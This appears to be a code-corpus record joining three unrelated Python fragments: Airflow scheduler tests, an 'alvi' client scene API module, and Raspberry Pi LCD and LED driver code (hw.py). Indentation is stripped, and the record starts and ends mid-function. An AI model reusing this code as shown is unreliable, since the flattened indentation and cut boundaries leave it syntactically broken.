six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
__init__.py
|
"""
low level API
consider using the higher level containers package instead of this one
"""
import multiprocessing
import collections
import time
import abc
import inspect
import alvi.client.data_generators
from .. import utils
API_URL_SCENE_SYNC = 'api/scene/sync'
API_URL_SCENE_REGISTER = 'api/scene/register'
class SubsequenceIDGenerator:
"""
generates deterministic (in particular subsequent) IDs for subsequent objects
"""
def __init__(self):
self._cache = dict()
def __call__(self, obj):
return self._cache.setdefault(id(obj), len(self._cache))
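# Illustrative usage, added for clarity (not part of the original module):
# repeated calls with the same object return the same ID, and each new object
# gets the next integer, because the cache is keyed by id(obj).
#
#   gen = SubsequenceIDGenerator()
#   a, b = object(), object()
#   gen(a)  # -> 0
#   gen(b)  # -> 1
#   gen(a)  # -> 0 (cached)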
class Pipe:
def __init__(self, scene_instance_id, id_generator=None):
self._scene_instance_id = scene_instance_id
self._backlog = collections.OrderedDict()
self._id_generator = id_generator if id_generator else SubsequenceIDGenerator()
def send(self, action_type, key, args):
message = dict(
type=action_type,
args=args
)
key = (action_type, ) + key
self._backlog[repr(key)] = message
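# Added note: the backlog is keyed by repr((action_type,) + key), so repeated
# send() calls for the same action and key overwrite each other and only the
# most recent message per key is kept (in first-insertion order) until sync().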
def sync(self):
if not self._backlog:
return
data = dict(
instance_id=self._scene_instance_id,
messages=list(self._backlog.values()),
)
utils.post_to_server(API_URL_SCENE_SYNC, data)
self._backlog = self._backlog.__class__() # python 3.2 does not support clear() on dicts
time.sleep(1)
def generate_id(self, obj):
return self._id_generator(obj)
class BaseScene(metaclass=abc.ABCMeta):
@classmethod
def start(cls):
while True:
available_generators = dict(list(
(name, generator.Form().as_p()) for name, generator in alvi.client.data_generators.generators.items()
))
#TODO send this data just once
post_data = dict(
name=cls.__name__,
container=cls.container_name(),
source=inspect.getsource(cls),
form=cls.Form().as_p(),
available_generators=available_generators,
)
response = utils.post_to_server(API_URL_SCENE_REGISTER, post_data)
scene_instance_id = response['scene_instance_id']
options = response['options']
q = multiprocessing.Queue()
process = multiprocessing.Process(target=cls.create_instance, args=(q, ))
process.start()
q.put(scene_instance_id)
q.put(options)
@classmethod
def create_instance(cls, q):
instance_id = q.get()
options = q.get()
scene = cls()
pipe = Pipe(instance_id)
cls.run_wrapper(
scene,
pipe,
options=options,
data_generator=alvi.client.data_generators.make_data_generator(options),
)
pipe.send('finish', (0, ), {})
pipe.sync()
@classmethod
def run_wrapper(cls, scene, pipe, **kwargs):
scene.run(pipe, **kwargs)
@abc.abstractmethod
def run(self, **kwargs):
raise NotImplementedError
@classmethod
@abc.abstractmethod
def container_name(cls):
raise NotImplementedError
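# Illustrative sketch, not part of the original module: BaseScene.start()
# expects a subclass to provide a Form (with an as_p() method), container_name()
# and run(); the names used below are hypothetical.
#
#   class MyScene(BaseScene):
#       Form = MySceneForm  # hypothetical Django-style form with as_p()
#
#       @classmethod
#       def container_name(cls):
#           return 'graph'
#
#       def run(self, pipe, **kwargs):
#           node_id = pipe.generate_id(self)
#           pipe.send('create', (node_id,), dict(label='hello'))
#           pipe.sync()
#
#   MyScene.start()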
|
hw.py
|
# ------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""
TODO module description
"""
import datetime
import logging
import logging.handlers
# TODO Is UnresolvedImport needed? hw.py should not be enabled on a non-Pi; same for LCD below.
import pibrella # @UnresolvedImport when not on R-Pi
import signal
import sys
from time import sleep
from threading import Thread
from threading import Event
import traceback
import math
import operator
import Queue
import Adafruit_CharLCD as LCD # @UnresolvedImport when not on R-Pi
# Tried various installs; finally got this working, but it seems too complex
import sys
sys.path.append('/opt/designchallenge2015/Adafruit-Raspberry-Pi-Python-Code/Adafruit_PWM_Servo_Driver')
from Adafruit_PWM_Servo_Driver import PWM
from interfaces import IDisplay
from interfaces import ILed
from interfaces import IPushButtonMonitor
from interfaces import IVibrationMotor
from interfaces import IBuzzer
from interfaces import IInput
from interfaces import IUrgencyLed
from station.util import Config
from station.util import PushButton
from mido import MidiFile
import os
from enum import Enum
# ------------------------------------------------------------------------------
class Display(IDisplay):
"""
TODO class comment
"""
COLORS = {"BLACK": (0.0, 0.0, 0.0), # backlight off
"RED": (1.0, 0.0, 0.0),
"GREEN": (0.0, 1.0, 0.0),
"BLUE": (0.0, 0.0, 1.0),
"CYAN": (0.0, 1.0, 1.0),
"MAGENTA": (1.0, 0.0, 1.0),
"YELLOW": (1.0, 1.0, 0.0),
"WHITE": (1.0, 1.0, 1.0),
}
# --------------------------------------------------------------------------
def __init__(self,
config):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Constructing display')
self._line1Text = ''
self._line2Text = ''
self._lineWidth = config.lineWidth
logger.debug('Display line width: {} chars'.format(self._lineWidth))
self._lcd = LCD.Adafruit_CharLCDPlate()
# --------------------------------------------------------------------------
def __enter__(self):
""" Called when the context of a "with" statement is entered
Returns:
Reference to self
"""
logger.debug('Entering display')
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
""" Called when the context of a "with" statement is exited
Clears the display text and hides the cursor. The backlight is left in its
current state.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting display')
self.setText('')
self.showCursor(False) # must call after setText(), which displays the cursor
# --------------------------------------------------------------------------
def lineWidth(self):
""" Returns: the number of columns in a line of the display.
"""
return self._lineWidth
# --------------------------------------------------------------------------
def setBgColor(self,
color):
''' Set the display background color to the specified color.
Sets the display backlight to the color specified by the color name parameter.
The valid color names are "BLACK", "RED", "GREEN", "BLUE", "CYAN", "YELLOW",
"MAGENTA", "WHITE".
Raises:
KeyError if color is not one of the valid color string values.
'''
self._lcd.set_color(*self.COLORS[color])
# --------------------------------------------------------------------------
def setLine1Text(self,
text):
"""Sets the text for line 1 of the display.
Sets the text for line 1 of the display. If the text is too long to fit
on the display, then the text scrolls over time.
Args:
text (string): The text to display.
"""
self._line1Text = "{:<{width}}".format(text, width=self._lineWidth)
#logger.debug('Setting Line 1 text to "%s"' % self._line1Text)
self._refreshDisplay()
# --------------------------------------------------------------------------
def setLine2Text(self,
text):
"""Sets the text for line 2 of the display.
Sets the text for line 2 of the display. If the text is too long to fit
on the display, then the text scrolls over time.
Args:
text (string): The text to display.
"""
self._line2Text = "{:<{width}}".format(text, width=self._lineWidth)
#logger.debug('Setting Line 2 text to "%s"' % self._line2Text)
self._refreshDisplay()
# --------------------------------------------------------------------------
def setText(self,
text):
""" Sets the text for the entire display.
Directly sets the text for the display. Multiple lines can be provided
at once by separating with a '\n' character. The first two lines will
be displayed. Other lines will be discarded.
Args:
text (string): The text to display.
"""
lines = (text+'\n').split('\n')
self.setLine1Text(lines[0])
self.setLine2Text(lines[1])
self._refreshDisplay()
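# Example, added for illustration: setText('HELLO\nWORLD') puts 'HELLO' on
# line 1 and 'WORLD' on line 2; any lines past the second are discarded, and a
# single-line string leaves line 2 blank because of the appended '\n'.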
# --------------------------------------------------------------------------
def showCursor(self, show=True):
""" Shows or hides the cursor.
Make the cursor visible if show is True. Otherwise, make the cursor
invisible.
"""
#logger.debug('Setting show cursor value to %s' % (show))
self._lcd.blink(show)
self._lcd.show_cursor(show)
# --------------------------------------------------------------------------
def setCursor(self, row=0, col=0):
""" Sets the position of the cursor and makes it visible.
"""
#logger.debug('Setting cursor position to (r=%s, c=%s)' % (row, col))
self._lcd.set_cursor(col, row)
self.showCursor()
# --------------------------------------------------------------------------
def _refreshDisplay(self):
""" Sends text to the display
Sends or resends the text stored in _line1Text and _line2Text to
the display. Also causes the cursor to be displayed.
"""
self.setCursor(0, 0)
self._lcd.message(self._line1Text + '\n' + self._line2Text)
#logger.debug('Display now reads "%s"[br]"%s"' % (self._line1Text, self._line2Text))
# ------------------------------------------------------------------------------
class LedType(Enum):
pibrella = 1
adafruit = 2
class I2CLedWorkerThreadCmd():
def __init__(self, startPercentageOn, endPercentageOn, durationInSeconds):
# Note duration of 0 = indefinitely
self.startPercentageOn = startPercentageOn
self.endPercentageOn = endPercentageOn
self.durationInSeconds = durationInSeconds
class I2CLedWorkerThread(Thread):
""" A worker thread that controls an led light over a period of time.
This is done to exploit the queue's blocking wait, which uses less
CPU time than sleeping and helps avoid thrashing when many of these
run concurrently. It was adapted from the public domain work:
http://eli.thegreenplace.net/2011/12/27/python-threads-communication-and-stopping
TaskMaster must support the following:
setLed(newPercentBrightness), so the thread can reach back and set the light level
cmds, a Queue of I2CLedWorkerThreadCmd objects.
The thread runs with a fixed periodicity; on each tick it starts the
next available command, and if there is no new command it keeps doing
whatever it was doing.
Ask the thread to stop by calling its join() method to clean up before
exiting the application. __exit__ should be called to catch this but
currently it appears to not always be called.
"""
def __init__(self, taskMaster):
super(I2CLedWorkerThread, self).__init__()
self._taskMaster = taskMaster
# init variables for supporting dynamic lighting changes
self._currentBrightness = 0
self._endBrightness = 0
self._stepsRemaining = 0
# Set minimum time step between changes
self._TIME_TICK = 0.001 # note 0.0001 is possible but CPU thrashes
self._delta = self._TIME_TICK
self._isChanging = False
self.stoprequest = Event()
def run(self):
# As long as we weren't asked to stop, try to take new tasks from the
# queue. The tasks are taken with a blocking 'get', so no CPU
# cycles are wasted while waiting.
# Also, 'get' is given a timeout, so stoprequest is always checked,
# even if there's nothing in the queue.
while not self.stoprequest.isSet():
try:
nextCmd = self._taskMaster.cmds.get(True,self._TIME_TICK)
# if no cmd keep doing what you were doing even if was nothing
# by taking the exception path on the timeout
# otherwise process the new command and reset the thread state
self._isChanging = True
self._currentBrightness = nextCmd.startPercentageOn / 100.0
self._endBrightness = nextCmd.endPercentageOn / 100.0
if nextCmd.durationInSeconds > self._TIME_TICK:
# note early python ceil could return float
self._stepsRemaining = int(math.ceil(nextCmd.durationInSeconds/self._TIME_TICK))
self._delta = (self._endBrightness - self._currentBrightness) / self._stepsRemaining
elif nextCmd.durationInSeconds == 0:
self._stepsRemaining = 0
self._currentBrightness = self._endBrightness
self._isChanging = False
else:
self._stepsRemaining = 1
self._taskMaster.setLed(self._currentBrightness)
except Queue.Empty:
if self._isChanging:
if self._stepsRemaining > 1:
self._currentBrightness = self._currentBrightness + self._delta
elif 1 == self._stepsRemaining:
self._currentBrightness = self._endBrightness
# Reached the base case for fade so terminate it
self._isChanging = False
# TODO handle if pulsing
# Reset values for next pulse cycle then treat like fade
self._stepsRemaining = self._stepsRemaining - 1
#self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(self._currentBrightness))
self._taskMaster.setLed(self._currentBrightness)
continue
def join(self, timeout=None):
self.stoprequest.set()
super(I2CLedWorkerThread, self).join(timeout)
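# Illustrative usage, added as a comment (an assumption, since the worker thread
# is currently commented out in PibrellaLedFacade below): a task master would
# enqueue commands and let the thread drive its setLed() callback, e.g. a two
# second fade from off to full brightness:
#
#   facade.cmds.put(I2CLedWorkerThreadCmd(0, 100, 2.0))
#
# A durationInSeconds of 0 applies endPercentageOn on the next tick.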
class PibrellaLedFacade():
def __init__(self, chan, val, step, enabled):
self._val = int(math.floor(val)) # just in case is float and using 2.x
self._step = step # TODO so we really don't honor this right now
self._chan = chan
self.enabled = enabled
self._gamma = []
self._MAX_LEVEL = self._val
for i in range(self._MAX_LEVEL+1):
self._gamma.append(int(pow(i/(1.0*self._MAX_LEVEL), 2.8)*self._MAX_LEVEL))
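# Added note: with _MAX_LEVEL = 4095 (the value Led passes in below) this is a
# gamma-2.8 lookup table, so a linear 50% level (index ~2048) maps to roughly
# int(4095 * 0.5 ** 2.8) ~= 588, which is intended to look closer to half
# brightness to the eye than the linear value would.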
initialValue = self._gamma[0]
if self.enabled:
initialValue = self._gamma[self._val]
self._pwm = PWM(0x40, debug=False)
self._pwm.setPWMFreq(400)
self._pwm.setPWM(self._chan, 0, initialValue)
self._isRunning = False
self.cmds = Queue.Queue()
#self._thread = I2CLedWorkerThread(self)
#self._thread.start()
def __exit__(self, type, value, traceback):
self.off()
if self._isRunning:
# stop was not called first so try to clean up
self.stop()
# --------------------------------------------------------------------------
def stop(self):
"""This MUST be called when your program is shutting down.
TODO Detailed multi-line description if
necessary.
This cleans up all of the thread processing and leaves the led off.
Note that once stop() is called, on() and off() still work, but fade()
and pulse() will no longer work.
TODO redo this threading model to allow cleaner working thread.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.info('Stopping LED.')
self.off()
self._isRunning = False
# self._thread.join()
def _percentOnAsDecimalToGammaLevel(self, valueFromZeroToOne):
# note use of int is for earlier python when floor could return float
gammaLevel = int(math.floor(self._MAX_LEVEL * valueFromZeroToOne))
gammaValue = 0
if gammaLevel >= 0 and gammaLevel <= self._MAX_LEVEL:
gammaValue = self._gamma[gammaLevel]
return gammaValue
def setLed(self, newPercentBrightness):
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(newPercentBrightness))
def on(self):
#nextCmd = I2CLedWorkerThreadCmd(100,100,0)
#self.cmds.put(nextCmd)
self._val = self._MAX_LEVEL
self.enabled = True
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(1))
def off(self):
#nextCmd = I2CLedWorkerThreadCmd(0,0,0)
#self.cmds.put(nextCmd)
self._val = 0
self.enabled = False
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(0))
def fade(self, startPercentageOn, endPercentageOn, durationInSeconds):
#nextCmd = I2CLedWorkerThreadCmd(startPercentageOn, endPercentageOn, durationInSeconds)
#self.cmds.put(nextCmd)
self._pwm.setPWM(self._chan, 0, self._percentOnAsDecimalToGammaLevel(1))
def pulse(self, fadeInTime, fadeOutTime, onTime, offTime):
# TODO
pass
def decay(self):
""" Decay from full brightness to off
Each call updates the LED (if enabled) to go from full brightness to
off in smooth steps. True is returned if the LED is still on (non-zero
brightness). False is returned if the LED has decayed to off (zero)
brightness.
"""
if self.enabled:
if self._val >= self._step:
self._val = self._val - self._step
self._pwm.setPWM(self._chan, 0, self._gamma[self._val])
return True
else:
self._val = 0
self._pwm.setPWM(self._chan, 0, self._gamma[self._val])
self.enabled = False
return False
else:
# The value should already be off so why keep setting it?
#self._pwm.setPWM(self._chan, 0, self._gamma[0])
